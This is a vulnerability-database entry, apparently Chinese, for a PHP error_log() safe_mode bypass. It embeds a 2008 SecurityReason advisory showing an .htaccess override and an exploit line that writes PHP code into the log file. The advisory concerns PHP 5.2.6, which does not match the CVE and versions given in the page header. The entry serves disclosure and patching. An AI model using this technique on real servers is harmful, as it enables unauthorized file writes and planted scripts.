PHP error_log()函数 安全模式限制绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116787 漏洞类型 权限许可和访问控制
发布时间 2008-11-20 更新时间 2008-11-20
CVE编号 CVE-2006-3011 CNNVD-ID CNNVD-200606-501
漏洞平台 Multiple CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/7171
https://www.securityfocus.com/bid/18645
https://cxsecurity.com/issue/WLB-2006060134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-501
|漏洞详情
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP的error_log()函数中存在安全模式限制绕过漏洞。拥有加载任意PHP代码或指定error_log()函数调用参数权限的用户可以利用这个漏洞从目标系统读取或写入受限文件。
|漏洞EXP
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008

SecurityReason Research
SecurityAlert Id: 57

CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl 
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web 
developers to write dynamically generated pages quickly.

error_log

They allow you to define your own error handling rules, as well as modify the way the errors can 
be logged. This allows you to change and enhance error reporting to suit your needs.

- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode

php.ini­:
safe_mode = On

and declaring via php_admin_flag

<Directory "/www">
...
	php_admin_flag safe_mode On
</Directory>

When we create some php script in /www/ and try call to:

ini_set("error_log", "/hack/");

or in /www/.htaccess

php_value error_log "/hack/bleh.php"


Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4


It was for safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On 

in httpd.conf, we will get only

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

syntax in .htaccess

php_value error_log "/hack/blehx.php"

is allowed and bypass safe_mode.

example exploit:
error_log("<?php phpinfo(); ?>", 0);

- --- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not use safe_mode as a main safety.

 --- 3. Greets ---
sp3x Infospec schain p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

# milw0rm.com [2008-11-20]
|受影响的产品
PHP PHP 5.1.4 PHP PHP 4.4.2 Mandriva Linux Mandrake 2006.0 x86_64 Mandriva Linux Mandrake 2006.0 Mandriva Linux Mandrake 10.2 x86_64 Mandriva Linux Mandrake 10.2
|参考资料

来源:SECUNIA
名称:21546
链接:http://secunia.com/advisories/21546
来源:XF
名称:php-errorlog-safe-mode-bypass(27414)
链接:http://xforce.iss.net/xforce/xfdb/27414
来源:UBUNTU
名称:USN-320-1
链接:http://www.ubuntu.com/usn/usn-320-1
来源:www.php.net
链接:http://www.php.net/release_5_1_5.php
来源:OSVDB
名称:26827
链接:http://www.osvdb.org/26827
来源:VUPEN
名称:ADV-2006-2523
链接:http://www.frsirt.com/english/advisories/2006/2523
来源:SECTRACK
名称:1016377
链接:http://securitytracker.com/id?1016377
来源:SREASONRES
名称:20060625error_log()SafeModeBypassPHP5.1.4and4.4.2
链接:http://securityreason.com/achievement_securityalert/41
来源:SECUNIA
名称:21050
链接:http://secunia.com/advisories/21050
来源:SECUNIA
名称:20818
链接:http://secunia.com/advisories/20818
来源:MANDRIVA
名称:MDKSA-2006:122
链接:http://frontal2.mandriva.com/security/advisories?name=MDKSA-2006:122
来源:cvs.php.net
链接:http://cvs.php.net/viewvc.cgi/php-src/ext/standard/basic_functions.c?r1=1.543.2.51.2.9&r2=1.543.2.51.2.10&pathrev=PHP_4_4&diff_format=u
来源:cvs.php.net
链接:http://cvs.php.net/viewvc